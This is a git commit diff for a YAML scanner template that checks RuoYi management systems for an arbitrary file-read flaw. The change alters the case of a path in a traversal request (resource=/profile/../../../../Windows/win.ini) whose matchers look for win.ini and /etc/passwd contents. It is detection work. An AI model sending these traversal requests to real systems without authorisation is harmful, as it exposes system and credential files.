Update ruoyi-management-fileread.yml

This commit is contained in:
影舞者 2024-12-19 20:39:51 +08:00 committed by GitHub
parent 2c1bdd98ee
commit 6ee7bab188
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -7,7 +7,7 @@ groups:
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
windows:
- method: GET
path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini
path: /common/download/resource?resource=/profile/../../../../Windows/win.ini
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail: